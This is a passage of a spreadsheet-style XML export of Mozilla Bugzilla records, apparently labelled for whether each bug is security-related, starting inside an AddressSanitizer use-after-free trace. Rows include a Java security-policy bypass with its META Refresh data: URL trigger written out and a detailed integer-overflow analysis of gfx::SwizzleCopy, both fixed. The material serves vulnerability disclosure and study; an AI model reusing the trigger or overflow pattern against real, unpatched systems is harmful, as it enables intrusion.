    #25 0x7f51f507548f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #26 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #27 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #28 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #29 0x7f51f4e043ac in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f51f4dd39df in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #31 0x7f51f4de14cf in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #32 0x7f51f4de3c7e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #33 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #34 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #35 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #36 0x7f51f4b66b8d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
previously allocated by thread T0 here:
    #0 0x4b24fb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0ded in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f51ef3215a9 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f51ef3215a9 in NS_NewHTMLInputElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:129
    #4 0x7f51ef4c8456 in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:291:41
    #5 0x7f51ef4c8456 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:263
    #6 0x7f51ed226afe in nsIDocument::CreateHTMLElement(nsIAtom*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:12559:28
    #7 0x7f51f174853d in nsNumberControlFrame::MakeAnonymousElement(mozilla::dom::Element**, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;, nsIAtom*, mozilla::CSSPseudoElementType, nsStyleContext*) /home/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:333:35
    #8 0x7f51f174907b in nsNumberControlFrame::CreateAnonymousContent(nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /home/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:392:8
    #9 0x7f51f1197197 in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4228:17
    #10 0x7f51f1189b72 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10775:3
    #11 0x7f51f11a30a1 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4026:9
    #12 0x7f51f11ae196 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6196:3
    #13 0x7f51f118a8c4 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10640:5
    #14 0x7f51f118a8c4 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10852
    #15 0x7f51f11951ad in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&amp;, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11862:3
    #16 0x7f51f1191608 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2625:5
    #17 0x7f51f11b4876 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7753:7
    #18 0x7f51f137f815 in PresShell::ContentInserted(nsIDocument*, nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4427:3
    #19 0x7f51ed32d6de in nsNodeUtils::ContentInserted(nsINode*, nsIContent*, int) /home/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:201:3
    #20 0x7f51ed2d277e in nsINode::doInsertChildAt(nsIContent*, unsigned int, bool, nsAttrAndChildArray&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1630:7
    #21 0x7f51ed2d8ec6 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2514:14
    #22 0x7f51ed9ab98b in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1850:12
    #23 0x7f51ed9ab98b in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1854
    #24 0x7f51ed9ab98b in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:696
    #25 0x7f51eed10399 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
    #26 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #27 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #28 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #29 0x7f51f4e043ac in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f51f4dd39df in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #31 0x7f51f4de14cf in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #32 0x7f51f4de3c7e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #33 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #34 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #35 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #36 0x7f51f507548f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #37 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c2a8009e6e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a8009e6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a8009e700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a8009e710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a8009e720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c2a8009e730: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
  0x0c2a8009e740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8009e750: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8009e760: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c2a8009e770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2a8009e78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9513==ABORTING</t>
        </is>
      </c>
      <c r="X644" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="645">
      <c r="A645" t="n">
        <v>1356551</v>
      </c>
      <c r="B645" t="inlineStr">
        <is>
          <t>2017-04-14 05:29:28 -0700</t>
        </is>
      </c>
      <c r="C645" t="inlineStr">
        <is>
          <t>[UX] about:addons Plug-ins content and design update</t>
        </is>
      </c>
      <c r="D645" t="inlineStr">
        <is>
          <t>2017-05-30 09:52:12 -0700</t>
        </is>
      </c>
      <c r="E645" t="n">
        <v>1</v>
      </c>
      <c r="F645" t="n">
        <v>1</v>
      </c>
      <c r="G645" t="n">
        <v>2</v>
      </c>
      <c r="H645" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I645" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J645" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K645" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L645" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M645" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N645" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O645" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P645" t="inlineStr">
        <is>
          <t>[photon-visual][ux]</t>
        </is>
      </c>
      <c r="Q645" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R645" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S645" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T645" t="n">
        <v>1</v>
      </c>
      <c r="U645" t="n">
        <v>0</v>
      </c>
      <c r="V645" t="n">
        <v>1</v>
      </c>
      <c r="W645" t="inlineStr">
        <is>
          <t>Update icon and page illustration to align with Photon design.</t>
        </is>
      </c>
      <c r="X645" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="646">
      <c r="A646" t="n">
        <v>953373</v>
      </c>
      <c r="B646" t="inlineStr">
        <is>
          <t>2013-12-28 14:54:18 -0800</t>
        </is>
      </c>
      <c r="C646" t="inlineStr">
        <is>
          <t>Assertion failure: MIR instruction returned object with unexpected type, at js/src/jit/IonMacroAssembler.cpp:1223, loading Amazon product page</t>
        </is>
      </c>
      <c r="D646" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:21 -0800</t>
        </is>
      </c>
      <c r="E646" t="n">
        <v>1</v>
      </c>
      <c r="F646" t="n">
        <v>1</v>
      </c>
      <c r="G646" t="n">
        <v>3</v>
      </c>
      <c r="H646" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I646" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J646" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K646" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L646" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M646" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N646" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O646" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P646" t="inlineStr">
        <is>
          <t>[qa-][adv-main27+]</t>
        </is>
      </c>
      <c r="Q646" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R646" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S646" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T646" t="n">
        <v>1</v>
      </c>
      <c r="U646" t="n">
        <v>0</v>
      </c>
      <c r="V646" t="n">
        <v>21</v>
      </c>
      <c r="W646" t="inlineStr">
        <is>
          <t>Loading http://www.amazon.com/gp/product/0415368197/ref=as_li_tf_tl?ie=UTF8&amp;camp=1789&amp;cr
eative=9325&amp;creativeASIN=0415368197&amp;linkCode=as2&amp;tag=matthygles-20 reliably yields a crash:
Assertion failure: MIR instruction returned object with unexpected type, at js/src/jit/IonMacroAssembler.cpp:1223
I can't get gdb to give me a useful stack, nor does this assertion trigger the usual handler that prints a stack trace (which is odd).
I'm using a local debug build built with my local changes on top of https://hg.mozilla.org/mozilla-central/rev/451f47a70238</t>
        </is>
      </c>
      <c r="X646" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="647">
      <c r="A647" t="n">
        <v>589041</v>
      </c>
      <c r="B647" t="inlineStr">
        <is>
          <t>2010-08-19 20:11:40 -0700</t>
        </is>
      </c>
      <c r="C647" t="inlineStr">
        <is>
          <t>Java security bypass from LiveConnect loaded via META Refresh "data:" URL</t>
        </is>
      </c>
      <c r="D647" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:22 -0700</t>
        </is>
      </c>
      <c r="E647" t="n">
        <v>1</v>
      </c>
      <c r="F647" t="n">
        <v>1</v>
      </c>
      <c r="G647" t="n">
        <v>3</v>
      </c>
      <c r="H647" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I647" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J647" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K647" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L647" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M647" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N647" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O647" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P647" t="inlineStr">
        <is>
          <t>[sg:critical][critsmash:investigating][qa-examined-192]</t>
        </is>
      </c>
      <c r="Q647" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R647" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S647" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T647" t="n">
        <v>1</v>
      </c>
      <c r="U647" t="n">
        <v>0</v>
      </c>
      <c r="V647" t="n">
        <v>65</v>
      </c>
      <c r="W647" t="inlineStr">
        <is>
          <t>The Java security policy may be bypassed when LiveConnect script is loaded via a "data:" URL using a META Refresh.
The basic construct would appear as:
&lt;meta http-equiv="Refresh" content="0,data:text/html,&lt;html&gt;&lt;body&gt;&lt;script&gt;alert(self.java);&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;"&gt;
This script will run with under a security policy of "moz-nullprincipal:{xxxx-xxxx-xxxx}".  It appears that the plugin logic may not be correctly accounting for this.
The severity of this issue seems highly dependent on browser, JRE version, plugin and platform.  
Tested with Apple Java (MRJ/JEP plugin):
Firefox 3.6 - Mac OS X: read files, connect sockets, execute programs
Firefox 3.5 - Mac OS X: read files, connect sockets, execute programs
Tested using Oracle/Sun JavaSE:
Firefox 3.6 - Windows - JRE 1.6: crash JVM
Firefox 3.5 - Windows - JRE 1.6: crash JVM
Firefox 3.5 - Windows - JRE 1.5: read files
Firefox 3.6 - Linux - JRE 1.6: crash JVM
Firefox 3.5 - Linux - JRE 1.6: read files
Firefox 3.5 - Linux - JRE 1.5: read files
Tested with OpenJDK: 
Firefox 3.6 - Linux - IcedTea6: no bypasses observed
Note: also tested with latest nightly (20100819) 3.6 and 3.5 builds with same results.</t>
        </is>
      </c>
      <c r="X647" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="648">
      <c r="A648" t="n">
        <v>124920</v>
      </c>
      <c r="B648" t="inlineStr">
        <is>
          <t>2002-02-11 15:07:30 -0800</t>
        </is>
      </c>
      <c r="C648" t="inlineStr">
        <is>
          <t>Templatise post_bug.cgi</t>
        </is>
      </c>
      <c r="D648" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:28 -0800</t>
        </is>
      </c>
      <c r="E648" t="n">
        <v>1</v>
      </c>
      <c r="F648" t="n">
        <v>1</v>
      </c>
      <c r="G648" t="n">
        <v>4</v>
      </c>
      <c r="H648" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I648" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J648" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K648" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L648" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M648" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N648" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O648" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P648" t="inlineStr"/>
      <c r="Q648" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R648" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S648" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T648" t="n">
        <v>1</v>
      </c>
      <c r="U648" t="n">
        <v>0</v>
      </c>
      <c r="V648" t="n">
        <v>26</v>
      </c>
      <c r="W648" t="inlineStr">
        <is>
          <t>This should really be part of enter_bug.cgi, but there's no time for that so
late in the game. 
Gerv</t>
        </is>
      </c>
      <c r="X648" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="649">
      <c r="A649" t="n">
        <v>494527</v>
      </c>
      <c r="B649" t="inlineStr">
        <is>
          <t>2009-05-22 17:47:27 -0700</t>
        </is>
      </c>
      <c r="C649" t="inlineStr">
        <is>
          <t>Promo module behavior isn't quite right</t>
        </is>
      </c>
      <c r="D649" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E649" t="n">
        <v>1</v>
      </c>
      <c r="F649" t="n">
        <v>1</v>
      </c>
      <c r="G649" t="n">
        <v>6</v>
      </c>
      <c r="H649" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I649" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J649" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K649" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L649" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M649" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N649" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O649" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P649" t="inlineStr"/>
      <c r="Q649" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R649" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S649" t="inlineStr">
        <is>
          <t>5.0.6</t>
        </is>
      </c>
      <c r="T649" t="n">
        <v>1</v>
      </c>
      <c r="U649" t="n">
        <v>0</v>
      </c>
      <c r="V649" t="n">
        <v>12</v>
      </c>
      <c r="W649" t="inlineStr">
        <is>
          <t>So the spec says "second position" which means default the promo module to the first featured collection, instead of the tour, since at this point the user doesn't need a tour.</t>
        </is>
      </c>
      <c r="X649" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="650">
      <c r="A650" t="n">
        <v>1463244</v>
      </c>
      <c r="B650" t="inlineStr">
        <is>
          <t>2018-05-21 13:07:19 -0700</t>
        </is>
      </c>
      <c r="C650" t="inlineStr">
        <is>
          <t>Buffer Overflow in gfx::SwizzleCopy</t>
        </is>
      </c>
      <c r="D650" t="inlineStr">
        <is>
          <t>2024-05-30 09:46:06 -0700</t>
        </is>
      </c>
      <c r="E650" t="n">
        <v>1</v>
      </c>
      <c r="F650" t="n">
        <v>1</v>
      </c>
      <c r="G650" t="n">
        <v>3</v>
      </c>
      <c r="H650" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I650" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J650" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K650" t="inlineStr">
        <is>
          <t>54 Branch</t>
        </is>
      </c>
      <c r="L650" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M650" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N650" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O650" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P650" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main61+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q650" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R650" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S650" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T650" t="n">
        <v>1</v>
      </c>
      <c r="U650" t="n">
        <v>0</v>
      </c>
      <c r="V650" t="n">
        <v>13</v>
      </c>
      <c r="W650" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20100101
Steps to reproduce:
gfx::SwizzleCopy (gfx/2d/Swizzle.cpp) is unsafe:
static void
SwizzleCopy(const uint8_t* aSrc, int32_t aSrcGap,
            uint8_t* aDst, int32_t aDstGap,
            IntSize aSize, int32_t aBPP)
{
  if (aSrc != aDst) {
    int32_t rowLength = aBPP * aSize.width; // (1)
    for (int32_t height = aSize.height; height &gt; 0; height--) {
      memcpy(aDst, aSrc, rowLength); // (0)
      aSrc += rowLength + aSrcGap; // (2)
      aDst += rowLength + aDstGap; // (3)
    }
  }
}
At (1), rowLength can overflow and become a very large negative value. For example, if aSize.width = 0x20000000, it will overflow to -2147483648 at 4 BPP. Then, the overflowed value is used at (2) and (3) to calculate pointers, that may either underflow the currently owned memory, or even wrap around aSrc/aDst on x86 arch. Then, the call to memcpy() at (0) with wrongly calculated pointers and count can cause an out of bound access.
In addition, both aSrcGap and aDstGap are calculated in the same unsafe manner in the caller:
bool
SwizzleData(const uint8_t* aSrc, int32_t aSrcStride, SurfaceFormat aSrcFormat,
            uint8_t* aDst, int32_t aDstStride, SurfaceFormat aDstFormat,
            const IntSize&amp; aSize)
{
  if (aSize.IsEmpty()) {
    return true;
  }
  IntSize size = CollapseSize(aSize, aSrcStride, aDstStride); // (4)
  // Find gap from end of row to the start of the next row.
  int32_t srcGap = aSrcStride - BytesPerPixel(aSrcFormat) * aSize.width; // (5)
  int32_t dstGap = aDstStride - BytesPerPixel(aDstFormat) * aSize.width; // (6)
  MOZ_ASSERT(srcGap &gt;= 0 &amp;&amp; dstGap &gt;= 0); // (7)
[...]
  if (aSrcFormat == aDstFormat) {
    // If the formats match, just do a generic copy.
    SwizzleCopy(aSrc, srcGap, aDst, dstGap, size, BytesPerPixel(aSrcFormat));
    return true;
  }
[...]
}
At (5) and (6), srcGap and dstGap can overflow in exactly the same way as described above. The possibly overflowed values are then passed to SwizzleCopy and used to calculate pointer values.
Here an example of the crash on Firefox 59.0.2 which happens when aDst underflows and wraps around:
https://crash-stats.mozilla.com/report/index/19b58581-7c59-4227-95c3-9d0b30180422
And the crashes which happen when aDst or aSrc point to unowned memory:
aSrc: https://crash-stats.mozilla.com/report/index/aa3f07a1-6ed3-4aad-ae17-ed1170180424
aDst: https://crash-stats.mozilla.com/report/index/905535d1-49f9-4657-8e3a-8b73d0180427
The input graphics region which causes incorrect calculations is sanitized in a few places before the call to SwizzleCopy, but it is not sanitized properly. For example, at (4) the call to CollapseSize (/gfx/2d/Swizzle.cpp) does check that aSize.width * aSize.height is within safe bounds of int32, but the check only happens if specific conditions are met. Also, it does not account for the BPP multiplier which is used at (1), (5), (6):
static inline IntSize
CollapseSize(const IntSize&amp; aSize, int32_t aSrcStride, int32_t aDstStride)
{
  if (aSrcStride == aDstStride &amp;&amp;
      aSrcStride == 4 * aSize.width) {
    CheckedInt32 area = CheckedInt32(aSize.width) * CheckedInt32(aSize.height);
    if (area.isValid()) {
      return IntSize(area.value(), 1);
    }
  }
  return aSize;
}
One more check at (7) is a correct assert, however it's compiled out in release builds. A few more checks happen inside the CopyRect (gfx/2d/DataSurfaceHelpers.cpp) caller of SwizzleData, that again they do not account for the BytesPerPixel multiplier.
It would be optimal to insert early checks, for every acquired graphics region, that both values of width * bpp and height * bpp do not overflow int32, ideally with a margin. Because the value of BytesPerPixel is relatively small, such a check would automatically rule out majority of other possible overflows.</t>
        </is>
      </c>
      <c r="X650" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="651">
      <c r="A651" t="n">
        <v>1520736</v>
      </c>
      <c r="B651" t="inlineStr">
        <is>
          <t>2019-01-17 01:09:01 -0800</t>
        </is>
      </c>
      <c r="C651" t="inlineStr">
        <is>
          <t>Default to Alerts view</t>
        </is>
      </c>
      <c r="D651" t="inlineStr">
        <is>
          <t>2019-12-10 01:45:50 -0800</t>
        </is>
      </c>
      <c r="E651" t="n">
        <v>1</v>
      </c>
      <c r="F651" t="n">
        <v>1</v>
      </c>
      <c r="G651" t="n">
        <v>7</v>
      </c>
      <c r="H651" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I651" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J651" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K651" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L651" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M651" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N651" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O651" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P651" t="inlineStr"/>
      <c r="Q651" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R651" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S651" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T651" t="n">
        <v>1</v>
      </c>
      <c r="U651" t="n">
        <v>0</v>
      </c>
      <c r="V651" t="n">
